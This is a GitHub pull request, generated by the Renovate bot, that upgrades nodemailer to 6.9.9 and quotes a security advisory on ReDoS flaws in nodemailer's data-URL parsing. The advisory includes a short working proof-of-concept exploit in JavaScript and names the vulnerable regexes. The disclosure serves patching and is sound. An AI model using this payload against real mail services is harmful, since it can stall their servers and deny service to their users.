Skip to content
This repository was archived by the owner on Dec 9, 2025. It is now read-only.

chore(deps) Update dependency nodemailer to v6.9.9 [SECURITY] #145

Open
renovate wants to merge 1 commit into
base: dev
Choose a base branch
from
Open

chore(deps) Update dependency nodemailer to v6.9.9 [SECURITY] #145

renovate wants to merge 1 commit into from

Conversation

@renovate
Copy link
Contributor

@renovate renovate bot commented Aug 6, 2024
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
nodemailer (source) 6.9.7 -> 6.9.9 age confidence

GitHub Vulnerability Alerts

GHSA-9h6g-pr28-7cqp

Summary

A ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter attachDataUrls set, causing the stuck of event loop.
Another flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop.

Details

Regex: /^data:((?:[^;];)(?:[^,])),(.)$/

Path: compile -> getAttachments -> _processDataUrl

Regex: /(<img\b[^>]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/

Path: _convertDataImages

PoC

https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6
https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698

async function exploit() {
   const MailComposer = require(\"nodemailer/lib/mail-composer\");
   const MailComposerObject = new MailComposer();

   // Create a malicious data URL that will cause excessive backtracking
   // This data URL is crafted to have a long sequence of characters that will cause the regex to backtrack
   const maliciousDataUrl = 'data:image/png;base64,' + 'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) + '==';

   // Call the vulnerable method with the crafted input
   const result = await MailComposerObject._processDataUrl({ path: maliciousDataUrl });
}

await exploit();

Impact

ReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.

Release Notes

nodemailer/nodemailer (nodemailer)

v6.9.9

Compare Source

Bug Fixes
  • security: Fix issues described in GHSA-9h6g-pr28-7cqp. Do not use eternal matching pattern if only a few occurences are expected (dd8f5e8)
  • tests: Use native node test runner, added code coverage support, removed grunt (#​1604) (be45c1b)

v6.9.8

Compare Source

Bug Fixes
  • punycode: do not use native punycode module (b4d0e0c)

Configuration

📅 Schedule: Branch creation - "" in timezone America/Chicago, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot added the security label Aug 6, 2024
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from d500eba to bb38141 Compare July 22, 2025 03:15
@renovate renovate bot changed the title chore(deps) Update dependency nodemailer to v6.9.9 [SECURITY] chore(deps) Update dependency nodemailer to v7 [SECURITY] Dec 2, 2025
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from bb38141 to ede56bb Compare December 2, 2025 01:10
@renovate renovate bot changed the title chore(deps) Update dependency nodemailer to v7 [SECURITY] chore(deps) Update dependency nodemailer to v6.9.9 [SECURITY] Dec 2, 2025
@renovate renovate bot force-pushed the renovate/npm-nodemailer-vulnerability branch from ede56bb to 2095285 Compare December 2, 2025 06:38
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.

Reviewers

No reviews

Assignees

No one assigned

Labels

security

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants